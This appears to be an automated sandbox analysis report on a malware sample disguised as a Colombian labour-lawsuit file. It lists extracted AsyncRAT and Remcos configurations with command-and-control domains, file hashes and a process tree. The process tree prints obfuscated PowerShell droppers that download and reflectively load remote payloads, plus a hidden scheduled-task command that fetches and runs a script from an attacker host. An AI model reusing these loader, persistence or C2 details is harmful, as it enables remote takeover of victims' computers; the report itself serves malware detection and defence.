Analysis

  • max time kernel
    147s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-08-2024 16:47

General

  • Target

    2 DEMNADA LABORAL- JUZGADO 02 CIVIL DEL CIRCUITO RAMA JUDICIAL/1 DEMANADA LABORAL.exe

  • Size

    3.1MB

  • MD5

    b841d408448f2a07f308ced1589e7673

  • SHA1

    f5b5095c0ed69d42110df6d39810d12b1fa32a1e

  • SHA256

    69a90665113bd73b30360d87f7f6ed2c789a90a67f3b6e86474e21273a64f699

  • SHA512

    a689734048109ab7bec9491bbb7781686c19c7885166b3ca2975e2f49e956fcc388cd8ca85a4e5a8bf9efe6056f1e0d80197b7f521d4f0d4cadb10ba9ef1fa93

  • SSDEEP

    49152:pvFg5qg9BtIAHE3SM4ahx6LK2SamuZob+tCjNrv8:Jm5qGBHBLRKuZfkjNrv8

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://bitbucket.org/556ghfhgfhgf/fdsfdsf/downloads/dllhope.txt

Extracted

Family

asyncrat

Version

| CRACKED BY https://t.me/xworm_v2

Botnet

Default

C2

enviasept.duckdns.org:3030

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

remcos

Botnet

RemoteHost

C2

sost2024ene.duckdns.org:1213

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-ZJ3RBQ

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2 DEMNADA LABORAL- JUZGADO 02 CIVIL DEL CIRCUITO RAMA JUDICIAL\1 DEMANADA LABORAL.exe
    "C:\Users\Admin\AppData\Local\Temp\2 DEMNADA LABORAL- JUZGADO 02 CIVIL DEL CIRCUITO RAMA JUDICIAL\1 DEMANADA LABORAL.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of WriteProcessMemory
    PID:3248
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\SysWOW64\cmd.exe
      2⤵
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:4916
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1856
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\emffxb.vbs"
          4⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4976
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bi▒GU▒YwBs▒HY▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒Gs▒YgB1▒G8▒aQ▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒G4▒YQBn▒HI▒b▒▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwBi▒Gk▒d▒Bi▒HU▒YwBr▒GU▒d▒▒u▒G8▒cgBn▒C8▒NQ▒1▒DY▒ZwBo▒GY▒a▒Bn▒GY▒a▒Bn▒GY▒LwBm▒GQ▒cwBm▒GQ▒cwBm▒C8▒Z▒Bv▒Hc▒bgBs▒G8▒YQBk▒HM▒LwBk▒Gw▒b▒Bo▒G8▒c▒Bl▒C4▒d▒B4▒HQ▒Jw▒p▒Ck▒OwBb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QQBw▒H▒▒R▒Bv▒G0▒YQBp▒G4▒XQ▒6▒Do▒QwB1▒HI▒cgBl▒G4▒d▒BE▒G8▒bQBh▒Gk▒bg▒u▒Ew▒bwBh▒GQ▒K▒▒k▒G4▒YQBn▒HI▒b▒▒p▒C4▒RwBl▒HQ▒V▒B5▒H▒▒ZQ▒o▒Cc▒QwBs▒GE▒cwBz▒Ew▒aQBi▒HI▒YQBy▒Hk▒Mw▒u▒EM▒b▒Bh▒HM▒cw▒x▒Cc▒KQ▒u▒Ec▒ZQB0▒E0▒ZQB0▒Gg▒bwBk▒Cg▒JwBa▒Hg▒SwBI▒Ec▒Jw▒p▒C4▒SQBu▒HY▒bwBr▒GU▒K▒▒k▒G4▒dQBs▒Gw▒L▒▒g▒Fs▒bwBi▒Go▒ZQBj▒HQ▒WwBd▒F0▒I▒▒o▒Cc▒d▒B4▒HQ▒LgBz▒HM▒bwBj▒G0▒ZQBy▒C8▒cwBk▒GE▒bwBs▒G4▒dwBv▒GQ▒LwBy▒GY▒aQBk▒HY▒cgBl▒HM▒LwB0▒Gc▒ZwBn▒HI▒YQBj▒HM▒ZQBk▒C8▒ZwBy▒G8▒LgB0▒GU▒awBj▒HU▒YgB0▒Gk▒Yg▒v▒C8▒OgBz▒H▒▒d▒B0▒Gg▒Jw▒g▒Cw▒I▒▒k▒Gs▒YgB1▒G8▒aQ▒g▒Cw▒I▒▒n▒F8▒XwBf▒F8▒XwBm▒GQ▒ZwBo▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒Jw▒s▒C▒▒J▒Bi▒GU▒YwBs▒HY▒L▒▒g▒Cc▒MQ▒n▒Cw▒I▒▒n▒FI▒bwBk▒GE▒Jw▒g▒Ck▒KQ▒7▒▒==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\emffxb.vbs');powershell -command $KByHL;
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2128
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$beclv = '0';$kbuoi = 'C:\Users\Admin\AppData\Local\Temp\emffxb.vbs';[Byte[]] $nagrl = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://bitbucket.org/556ghfhgfhgf/fdsfdsf/downloads/dllhope.txt'));[system.AppDomain]::CurrentDomain.Load($nagrl).GetType('ClassLibrary3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.ssocmer/sdaolnwod/rfidvres/tgggracsed/gro.tekcubtib//:sptth' , $kbuoi , '_____fdgh__________________-------------', $beclv, '1', 'Roda' ));"
              6⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:624
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of SetWindowsHookEx
                PID:3060
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ykbqbu.wsf"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:5052
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ybyaxf.wsf"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4024
  • C:\Windows\system32\schtasks.exe
    schtasks /create /sc MINUTE /mo 40 /tn "google actualizacion2024 Tas" /tr "\"%windir%\system32\WindowsPowershell\v1.0\powershell.exe\" -Windowstyle Hidden $a = wget 'http://sostenermio2024.duckdns.org/31agosto.vbs' -o C:\Windows\Temp\q.vbs;start-sleep 5;start-Process C:\Windows\Temp\q.vbs
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:3508
  • C:\Windows\system32\schtasks.exe
    schtasks /create /sc MINUTE /mo 40 /tn "google actualizacion2024 Tas" /tr "\"%windir%\system32\WindowsPowershell\v1.0\powershell.exe\" -Windowstyle Hidden $a = wget 'http://sostenermio2024.duckdns.org/31agosto.vbs' -o C:\Windows\Temp\q.vbs;start-sleep 5;start-Process C:\Windows\Temp\q.vbs
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:1948

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

    Filesize

    1KB

    MD5

    47ad785a164d8ff087b5fc8372b82520

    SHA1

    f23b4ab647065004331d06eb701783f4c89a74dd

    SHA256

    03c404532d410575bc3c3aeb45e8c3f0156801f985eb66111aee0672e682155a

    SHA512

    c6e9e7d2b8148432dc274966915c6a0c801a44f1b40fa17fa88a185243087606986befe3f19ba16953aa6d6d7e57788a6a265c105d01deae7bd154313f4985a4

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    12KB

    MD5

    65eece6e45e86ccf90a896b005f67a30

    SHA1

    be24253a36044cd6ad74c35686eb9e3d630383fe

    SHA256

    a5a5a9b25ec1cd22388f9c467de7ca5a0881a5f223e248b718e97c6fe1cd2607

    SHA512

    9e1e3eeddba53213166a4eb3e06dc84dc763ad63aab2f48c653d5dfdea32d12194495ac2992f7008a2dc7d8e27c9b24ed6587b2a439e0c16582c15eda93cafda

  • C:\Users\Admin\AppData\Local\Temp\2ba83e2

    Filesize

    780KB

    MD5

    e4978fbee6b1dd9aab76c06fd0cefc88

    SHA1

    f931b99a911b2231802f10666da3da88326b8fe2

    SHA256

    d5f8127a6762ae81d94d6c47e027ef74636bfe9a411c7ec266474aa420402990

    SHA512

    b9778ca17f1e3161b78af16706a439c32eff7803e0486baa1f9dc524780187924f4facdccf731c9f9e6264db996ef7ce77c9762db7ac12fd2cde259f2a95df56

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aup4eyvh.evj.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\emffxb.vbs

    Filesize

    11.3MB

    MD5

    4195393370dff560c647cea03c986705

    SHA1

    7fcbf81466c0dc1760205570c1248f80466da3f9

    SHA256

    7a82d66ac151f833b0b617777c883c9e02cf88d90b9394ec39ec6f80599e34e5

    SHA512

    2a74330dea0b751b7096fff9e08deee5122e66c6e5febb94dd97dfc5c3f9d51614f6eb6057c7d2bdec64f9d24e744871a3a050c6f129b77e2e6b845d0c6f4f91

  • C:\Users\Admin\AppData\Local\Temp\ykbqbu.wsf

    Filesize

    164KB

    MD5

    2e3704d10448cd561922b7561e6ec94c

    SHA1

    fd831fdcb2e0dd360b4765466d5384a1b3fa3ac1

    SHA256

    2b982915d800128a0149437f42684068a781e133ad607889f932fc9bec04b086

    SHA512

    fc8f204d28ed1494894008b7417885a5df8b5fb99c99f56cf9a8deee935334759576d7b2b840d1c8b004d3e4c9ad27fe0036b1b7a4d806c5666d5c1acebb9852

  • memory/624-74-0x0000000004AB0000-0x0000000004ABA000-memory.dmp

    Filesize

    40KB

  • memory/624-73-0x0000000004A90000-0x0000000004A98000-memory.dmp

    Filesize

    32KB

  • memory/624-72-0x0000000006E30000-0x0000000006E4A000-memory.dmp

    Filesize

    104KB

  • memory/624-71-0x0000000007690000-0x0000000007D0A000-memory.dmp

    Filesize

    6.5MB

  • memory/1856-36-0x0000000000BC0000-0x0000000000C36000-memory.dmp

    Filesize

    472KB

  • memory/1856-31-0x00000000056F0000-0x000000000578C000-memory.dmp

    Filesize

    624KB

  • memory/1856-38-0x0000000005C60000-0x0000000005C7E000-memory.dmp

    Filesize

    120KB

  • memory/1856-37-0x0000000000800000-0x0000000000810000-memory.dmp

    Filesize

    64KB

  • memory/1856-35-0x00000000752E0000-0x0000000075A90000-memory.dmp

    Filesize

    7.7MB

  • memory/1856-23-0x0000000073850000-0x0000000074AA4000-memory.dmp

    Filesize

    18.3MB

  • memory/1856-26-0x00000000752EE000-0x00000000752EF000-memory.dmp

    Filesize

    4KB

  • memory/1856-27-0x0000000000620000-0x0000000000636000-memory.dmp

    Filesize

    88KB

  • memory/1856-28-0x00000000752E0000-0x0000000075A90000-memory.dmp

    Filesize

    7.7MB

  • memory/1856-34-0x00000000752EE000-0x00000000752EF000-memory.dmp

    Filesize

    4KB

  • memory/1856-32-0x0000000005D40000-0x00000000062E4000-memory.dmp

    Filesize

    5.6MB

  • memory/1856-33-0x0000000005800000-0x0000000005866000-memory.dmp

    Filesize

    408KB

  • memory/2128-44-0x00000000050E0000-0x0000000005708000-memory.dmp

    Filesize

    6.2MB

  • memory/2128-54-0x0000000005860000-0x0000000005BB4000-memory.dmp

    Filesize

    3.3MB

  • memory/2128-48-0x0000000005780000-0x00000000057E6000-memory.dmp

    Filesize

    408KB

  • memory/2128-57-0x0000000005E50000-0x0000000005E6E000-memory.dmp

    Filesize

    120KB

  • memory/2128-58-0x0000000005E80000-0x0000000005ECC000-memory.dmp

    Filesize

    304KB

  • memory/2128-45-0x0000000005070000-0x0000000005092000-memory.dmp

    Filesize

    136KB

  • memory/2128-43-0x0000000002480000-0x00000000024B6000-memory.dmp

    Filesize

    216KB

  • memory/3060-75-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3060-76-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3060-89-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3060-88-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3060-87-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3060-86-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3060-80-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3060-77-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3248-2-0x00007FFAC1FD0000-0x00007FFAC21C5000-memory.dmp

    Filesize

    2.0MB

  • memory/3248-1-0x0000000074D80000-0x0000000074EFB000-memory.dmp

    Filesize

    1.5MB

  • memory/3248-8-0x0000000074D93000-0x0000000074D95000-memory.dmp

    Filesize

    8KB

  • memory/3248-9-0x0000000074D80000-0x0000000074EFB000-memory.dmp

    Filesize

    1.5MB

  • memory/3248-13-0x000000004A500000-0x000000004A60B000-memory.dmp

    Filesize

    1.0MB

  • memory/3248-0-0x0000000000CE0000-0x0000000000DCC000-memory.dmp

    Filesize

    944KB

  • memory/3248-14-0x0000000000CE0000-0x0000000000DCC000-memory.dmp

    Filesize

    944KB

  • memory/3248-10-0x0000000074D80000-0x0000000074EFB000-memory.dmp

    Filesize

    1.5MB

  • memory/3248-12-0x0000000000400000-0x0000000000711000-memory.dmp

    Filesize

    3.1MB

  • memory/4916-19-0x0000000074D80000-0x0000000074EFB000-memory.dmp

    Filesize

    1.5MB

  • memory/4916-20-0x0000000074D80000-0x0000000074EFB000-memory.dmp

    Filesize

    1.5MB

  • memory/4916-22-0x0000000074D80000-0x0000000074EFB000-memory.dmp

    Filesize

    1.5MB

  • memory/4916-15-0x0000000074D80000-0x0000000074EFB000-memory.dmp

    Filesize

    1.5MB

  • memory/4916-17-0x00007FFAC1FD0000-0x00007FFAC21C5000-memory.dmp

    Filesize

    2.0MB